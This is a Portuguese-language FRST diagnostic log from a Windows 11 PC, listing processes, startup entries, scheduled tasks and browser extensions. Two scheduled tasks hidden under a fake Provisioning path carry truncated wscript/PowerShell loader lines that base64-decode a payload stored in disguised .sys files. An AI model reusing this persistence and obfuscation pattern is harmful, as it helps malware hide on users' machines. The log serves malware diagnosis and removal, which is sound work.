Resultado do análise da Farbar Recovery Scan Tool (FRST) (x64) Versão: 15-08-2022
Executado por trean (administrador) em DESKTOP-PB33GKO (ASUS System Product Name) (21-08-2022 19:30:39)
Executando a partir de C:\Users\trean\Desktop
Perfis Carregados: trean
Plataforma: Microsoft Windows 11 Enterprise Versão 21H2 22000.856 (X64) Idioma: Português (Brasil)
Navegador padrão: Chrome
Modo da Inicialização: Normal

==================== Processos (Whitelisted) =================

(Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.)

(C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe ->) (Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\bdagent.exe
(C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe ->) (Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\bdntwrk.exe
(C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe ->) (Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\bdwtxag.exe
(C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe ->) (Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\seccenter.exe
(C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe ->) (S.C. BITDEFENDER S.R.L. -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\wsccommunicator.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(C:\Users\trean\Desktop\adwcleaner.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_11.2206.17.0_x64__8wekyb3d8bbwe\Notepad\Notepad.exe
(explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe <25>
(explorer.exe ->) (Malwarebytes Inc -> Malwarebytes) C:\Users\trean\Desktop\adwcleaner.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(services.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTek COMPUTER INC.) C:\Program Files (x86)\ASUS\ROG Live Service\ROGLiveService.exe
(services.exe ->) (ASUSTEK COMPUTER INCORPORATION -> ASUS Inc.) C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender Agent\redline\bdredline.exe
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe <3>
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\updatesrv.exe
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:\Program Files\Common Files\Bitdefender\SetupInformation\Bitdefender RedLine\bdredline.exe
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Windows\System32\WirelessKB850NotificationService.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.67.21001.0_x64__8wekyb3d8bbwe\gamingservices.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.67.21001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_47917a79b8c7fd22\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_31a20374e0a7b123\RtkAudUService64.exe
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
(svchost.exe ->) (ASUSTeK Computer Inc. -> ) C:\Program Files\ASUS\KINGSTON_Aac_DRAM\AacKingstonDramHal_x64.exe
(svchost.exe ->) (ASUSTeK Computer Inc. -> ) C:\Program Files\ASUS\KINGSTON_Aac_DRAM\AacKingstonDramHal_x86.exe
(svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUS) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\AcPowerNotification\AcPowerNotification.exe
(svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTek Compputer Inc.) C:\Program Files\ASUS\AacMB\Aac3572MbHal_x86.exe
(svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTeK Computer Inc.) C:\Program Files\ASUS\AacExtCard\extensionCardHal_x86.exe
(svchost.exe ->) (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Program Files\ASUS\ASUS_Aac_DRAM\Aac3572DramHal_x86.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.20970.0_x64__8wekyb3d8bbwe\HxOutlook.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.20970.0_x64__8wekyb3d8bbwe\HxTsr.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
Falha ao acessar processo -> NoiseCancelingEngine.exe

==================== Registro (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido. O arquivo não será movido.)

HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_31a20374e0a7b123\RtkAudUService64.exe [1333640 2021-08-18] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [129288 2022-03-05] (Adobe Inc. -> )
HKLM\...\RunOnce: [msedge_cleanup_{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}] => C:\Program Files (x86)\Microsoft\EdgeWebView\Application\104.0.1293.63\Installer\setup.exe [3286968 2022-08-21] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-535022414-3499471442-1354494860-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4234600 2022-08-19] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-535022414-3499471442-1354494860-1001\...\Run: [Discord] => C:\Users\trean\AppData\Local\Discord\Update.exe [1512104 2021-05-24] (Discord Inc. -> GitHub)
HKU\S-1-5-21-535022414-3499471442-1354494860-1001\...\Run: [elevenClock] => C:\Users\trean\AppData\Local\Programs\ElevenClock\ElevenClock.exe [52058432 2022-08-03] (Martí Climent) [Arquivo não assinado]
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\104.0.5112.101\Installer\chrmstp.exe [2022-08-20] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] ->

==================== Tarefas Agendadas (Whitelisted) ============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

Task: {134C7CD1-5413-4108-96BB-C5C071CC300C} - System32\Tasks\ASUS\ASUSUpdateTaskMachineCore1d85d4024040c30 => C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [153112 2022-05-01] (ASUSTeK COMPUTER INC. -> ASUSTeK Computer Inc.)
Task: {1BA8DD3C-645D-4C2C-B7F7-ABCD49951279} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [646344 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {1BB2CD52-4E46-4B11-BA09-2FDAD216F401} - System32\Tasks\ASUS\ASUSUpdateTaskMachineUA => C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [153112 2022-05-01] (ASUSTeK COMPUTER INC. -> ASUSTeK Computer Inc.)
Task: {2558F0B9-FA04-4221-9F96-B936AA64A49D} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3342080 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {2D03160C-90C1-4A25-8AD7-02BF5A53BF5D} - System32\Tasks\Intel\Intel Telemetry 2 => C:\Program Files\Intel\Telemetry 2.0\lrio.exe [2064744 2021-01-19] (Intel(R) Production Software -> Intel Corporation)
Task: {2D63D07F-62EE-46F6-A597-0E8F6593622C} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {4CEE609C-B125-471B-ABAC-8A743C35D283} - System32\Tasks\BlueStacksHelper_nxt => C:\Program Files\BlueStacks_nxt\BlueStacksHelper.exe [275136 2022-05-25] (Bluestack Systems, Inc -> BlueStack Systems, Inc.)
Task: {6205F746-5A8C-4D93-9246-08A4BFC4F782} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {66441D3C-3510-4F66-9696-33602EBC27B1} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender Security\bdagent.exe [987200 2022-08-08] (Bitdefender SRL -> Bitdefender)
Task: {70834A29-EE7D-49C0-AB5A-2F303F75B15D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154456 2021-06-28] (Google LLC -> Google LLC)
Task: {7313D8A9-5F81-4C91-BE46-BFA43A4CA4CB} - System32\Tasks\Microsoft\Windows\Management\Autopilot\RemediateHardwareChange => {62B2DD2C-F129-42EE-BF59-55D3FD21C215} C:\WINDOWS\System32\Autopilot.dll [217088 2022-07-23] (Microsoft Windows -> Microsoft Corporation)
Task: {7405A0CA-DB39-4274-9820-7C30DD35B012} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\26.0.1.231\WatchDog.exe [1053264 2022-07-25] (Bitdefender SRL -> Bitdefender)
Task: {7463AC3F-1D28-4D81-A84F-241AEB102D09} - System32\Tasks\Microsoft\Windows\Management\Provisioning\uVHdYU7n\EE40F928-0675-4114-816D-14F46AB3B1C0 => wscript.exe /e:vbscript /b "C:\Windows\System32\IHHuVHdY\FFC21546-537D-45EB-8886-5A8ACF753A6F" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\7nLYzGp\896C46C2-9270-4FF5-B1BC-3188EE7E1A45.sys'), 2072030, 422); $sc2 = [Convert]::FromBase64String($sc); (a entrada de dados tem 98 mais caracteres). <==== ATENÇÃO
Task: {7926FA19-0404-43E1-8439-C9A313BD81F8} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1003128 2022-03-01] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {7D2D30ED-7A88-444D-9EAC-830BC678A29E} - System32\Tasks\Microsoft\Windows\Management\Autopilot\DetectHardwareChange => {62B2DD2C-F129-42EE-BF59-55D3FD21C215} C:\WINDOWS\System32\Autopilot.dll [217088 2022-07-23] (Microsoft Windows -> Microsoft Corporation)
Task: {7D5278FE-9F1E-4CF4-85D4-ECED9847692F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154456 2021-06-28] (Google LLC -> Google LLC)
Task: {82C6ECB5-BC7D-4DD6-915D-268B9AF1519C} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {8A12120A-7836-4073-B21F-0E691DB43033} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
Task: {91A4F9AC-EE88-4A2C-B837-F80CFB018F2F} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {A8057FC0-3352-475C-BD73-DE2CE1ADA56C} - System32\Tasks\MicrosoftEdgeShadowStackRollbackTask => C:\Program Files (x86)\Microsoft\Edge\Application\104.0.1293.63\Installer\setup.exe [3286968 2022-08-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {B0D98F3A-34E9-4B4A-88A1-6F830A6B56FE} - System32\Tasks\ASUS\P508PowerAgent_sdk => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ShareFromArmouryIII\Mouse\ROG STRIX CARRY\P508PowerAgent.exe (Nenhum Arquivo)
Task: {C3CB31F0-5636-4EBE-9CCF-1DA1EA89F2DA} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2113024 2022-06-14] () [Arquivo não assinado]
Task: {C82E73A1-1A07-4C8C-98E8-B933EFA0EB97} - System32\Tasks\ASUS\ArmourySocketServer => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmourySocketServer.exe [2157024 2022-03-11] (ASUSTeK COMPUTER INC. -> ASUS)
Task: {C87A4BB2-BB98-481B-97CF-B5BA834662DB} - System32\Tasks\Microsoft\Windows\Management\Provisioning\Qh9i2O\0384CD6B-37FD-4229-A779-268B7B8CE12A => wscript.exe /e:vbscript /b "C:\Windows\System32\wwNQh9i2Ou\C6C803FC-B84C-4497-A1E3-B94560BD3752" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\OwucnC\E3821943-2D12-4B62-BF27-27564D0A771B.sys'), 2018793, 422); $sc2 = [Convert]::FromBase64String($sc); (a entrada de dados tem 99 mais caracteres). <==== ATENÇÃO
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => C:\WINDOWS\System32\MbaeParserTask.exe (Nenhum Arquivo)
Task: {D0323CE4-57AC-4F76-9EA9-7799718738AC} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {D1525516-349F-4372-927A-2F4EC27A0B0F} - System32\Tasks\ASUS\NoiseCancelingEngine => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\MBLedSDK\NoiseCancelingEngine.exe [1241960 2021-11-24] (ASUSTeK Computer Inc. -> ASUS)
Task: {D9513DC9-479B-42DD-9994-41E6D5E45467} - System32\Tasks\ASUS\AcPowerNotification => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\AcPowerNotification\AcPowerNotification.exe [293856 2022-03-11] (ASUSTeK COMPUTER INC. -> ASUS)
Task: {F35E4299-3108-477A-9DE6-0C43E1208B3B} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)

(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe

==================== Internet (Whitelisted) ====================

(Se um ítem for incluído na fixlist, sendo um ítem do Registro, será removido ou restaurado para o padrão.)

Tcpip\Parameters: [DhcpNameServer] 181.213.132.2 181.213.132.3
Tcpip\..\Interfaces\{03852173-405c-4568-ba4a-f3fda8fe169c}: [NameServer] 1.1.1.1,1.0.0.1
Tcpip\..\Interfaces\{03852173-405c-4568-ba4a-f3fda8fe169c}: [DhcpNameServer] 181.213.132.2 181.213.132.3
Tcpip\..\Interfaces\{1ae533b0-6428-46cc-b081-6f5cc44a995e}: [NameServer] 8.8.8.8,8.8.8.4
Tcpip\..\Interfaces\{1ae533b0-6428-46cc-b081-6f5cc44a995e}: [DhcpNameServer] 181.213.132.2 181.213.132.3

Edge:
=======
Edge Extension: (Sem Nome) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [não encontrado (a)]
Edge Extension: (Sem Nome) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [não encontrado (a)]
Edge Extension: (Sem Nome) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [não encontrado (a)]
Edge Extension: (Sem Nome) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [não encontrado (a)]
Edge DefaultProfile: Default
Edge Profile: C:\Users\trean\AppData\Local\Microsoft\Edge\User Data\Default [2022-08-21]
Edge Session Restore: Default -> está habilitado.
Edge Extension: (Halo The Series – Prophets) - C:\Users\trean\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\eggjaaiapifnlgehbjgbbophakkbhkpm [2022-04-23]
Edge Extension: (uBlock Origin) - C:\Users\trean\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\odfafepnkmbhccpbejgmiehpchacaeak [2022-07-14]
Edge HKLM-x32\...\Edge\Extension: [pdhdldaneekjpoaldekpgomomeabpnek]

FireFox:
========
FF DefaultProfile: 2cpndhoe.default
FF ProfilePath: C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test [2022-08-21]
FF Homepage: Mozilla\Firefox\Profiles\va3ikc0r.test -> hxxps://www.google.com/
FF Session Restore: Mozilla\Firefox\Profiles\va3ikc0r.test -> está habilitado.
FF Extension: (Disconnect) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\2.0@disconnect.me.xpi [2022-01-13]
FF Extension: (Enhancer for YouTube™) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\enhancerforyoutube@maximerf.addons.mozilla.org.xpi [2022-01-13]
FF Extension: (Tampermonkey) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\firefox@tampermonkey.net.xpi [2022-01-13]
FF Extension: (HTTPS Everywhere) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\https-everywhere@eff.org.xpi [2022-01-13]
FF Extension: (Alternate Player for Twitch.tv) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\twitch5@coolcmd.xpi [2022-01-13]
FF Extension: (uBlock Origin) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\uBlock0@raymondhill.net.xpi [2022-01-13]
FF Extension: (View image) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\{287dcf75-bec6-4eec-b4f6-71948a2eea29}.xpi [2022-01-13]
FF Extension: (YouTube Screenshot) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\{d8b32864-153d-47fb-93ea-c273c4d1ef17}.xpi [2022-01-13]
FF Extension: (DownThemAll!) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}.xpi [2022-01-13]
FF Extension: (Instagram Photo Plus) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\{feb6c5e7-41e5-4da1-a08f-5e3b73055be2}.xpi [2022-01-13]
FF ProfilePath: C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\2cpndhoe.default [2022-08-21]
FF ProfilePath: C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release [2022-08-21]
FF NetworkProxy: Mozilla\Firefox\Profiles\cya1mh2p.default-release -> type", 0
FF Session Restore: Mozilla\Firefox\Profiles\cya1mh2p.default-release -> está habilitado.
FF Extension: (Disconnect) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\2.0@disconnect.me.xpi [2021-06-28]
FF Extension: (English United States Dictionary) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\@unitedstatesenglishdictionary.xpi [2022-01-14]
FF Extension: (Dark Reader) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\addon@darkreader.org.xpi [2022-08-17]
FF Extension: (Enhancer for YouTube™) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\enhancerforyoutube@maximerf.addons.mozilla.org.xpi [2022-06-21]
FF Extension: (Tampermonkey) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\firefox@tampermonkey.net.xpi [2022-05-11]
FF Extension: (HTTPS Everywhere) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\https-everywhere@eff.org.xpi [2021-07-15]
FF Extension: (Magic Actions for YouTube™) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\jid0-UVAeBCfd34Kk5usS8A1CBiobvM8@jetpack.xpi [2021-06-28]
FF Extension: (English (US) Language Pack) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\langpack-en-US@firefox.mozilla.org.xpi [2022-08-09]
FF Extension: (Google Translator for Firefox) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\translator@zoli.bod.xpi [2022-07-27]
FF Extension: (Alternate Player for Twitch.tv) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\twitch5@coolcmd.xpi [2022-02-09]
FF Extension: (uBlock Origin) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\uBlock0@raymondhill.net.xpi [2022-08-18]
FF Extension: (View image) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\{287dcf75-bec6-4eec-b4f6-71948a2eea29}.xpi [2022-06-15]
FF Extension: (Voltar Dislikes do YouTube) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\{762f9885-5a13-4abd-9c77-433dcd38b8fd}.xpi [2022-08-06]
FF Extension: (YouTube Screenshot) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\{d8b32864-153d-47fb-93ea-c273c4d1ef17}.xpi [2021-06-28]
FF Extension: (DownThemAll!) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}.xpi [2022-08-04]
FF Extension: (Instagram Photo Plus) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\{feb6c5e7-41e5-4da1-a08f-5e3b73055be2}.xpi [2022-06-15]
FF HKLM\...\Firefox\Extensions: [bdwtwe@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender Security\bdwteff.xpi
FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender Security\bdwteff.xpi [2021-08-04] [UpdateUrl:hxxps://download.bitdefender.com/windows/desktop/connect/wallet/updates.json ]
FF HKLM\...\Firefox\Extensions: [bdtbe@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender Security\bdtbef.xpi
FF Extension: (Antitracker da Bitdefender) - C:\Program Files\Bitdefender\Bitdefender Security\bdtbef.xpi [2020-09-17] [UpdateUrl:hxxps://download.bitdefender.com/windows/desktop/connect/antitracker/updates.json ]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender Security\bdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender Security\bdtbext [2021-08-08] [] [não assinado]
FF HKLM-x32\...\Firefox\Extensions: [bdwtwe@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender Security\bdwteff.xpi
FF HKLM-x32\...\Firefox\Extensions: [bdtbe@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender Security\bdtbef.xpi
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender Security\bdtbext
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\autoconf_warsaw.js [2022-02-23]
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\bd_js_config.js [2021-07-01] <==== ATENÇÃO (Aponta para arquivo *.cfg)
FF ExtraCheck: C:\Program Files\mozilla firefox\bd_config.cfg [2021-07-01] <==== ATENÇÃO

Chrome:
=======
CHR Profile: C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default [2022-08-21]
CHR Notifications: Default -> hxxps://tetr.io
CHR HomePage: Default -> hxxps://www.google.com.br/
CHR StartupUrls: Default -> "hxxp://www.google.com.br/"
CHR Session Restore: Default -> está habilitado.
CHR Extension: (Alternate Player for Twitch.tv) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhplkbgoehhhddaoolmakpocnenplmhf [2022-04-06]
CHR Extension: (MEGA) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\bigefpfhnfcobdlfbedofhhaibnlghod [2022-08-20]
CHR Extension: (Chamada pelo Skype) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\blakpkgjpemejpbmfiglncklihnhjkij [2021-06-28]
CHR Extension: (uBlock Origin development build) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgbcahbpdhpcegmbfconppldiemgcoii [2022-08-20]
CHR Extension: (Slate) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhmcmgkegfffbbfobhjpdbimgmoohap [2021-09-07]
CHR Extension: (IG Downloader) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\cpgaheeihidjmolbakklolchdplenjai [2022-08-20]
CHR Extension: (AHA Music - Song Finder para Browser) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\dpacanjfikmhoddligfbehkpomnbgblf [2022-08-08]
CHR Extension: (Voltar Dislikes do YouTube) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\gebbhagfogifgggkldgodflihgfeippi [2022-08-09]
CHR Extension: (Documentos Google off-line) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-07-26]
CHR Extension: (Screenshot YouTube) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjoijpfmdhbjkkgnmahganhoinjjpohk [2021-12-20]
CHR Extension: (View Image Button) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\gllpomlmiljchdbigeahkpflkonfjiob [2022-06-05]
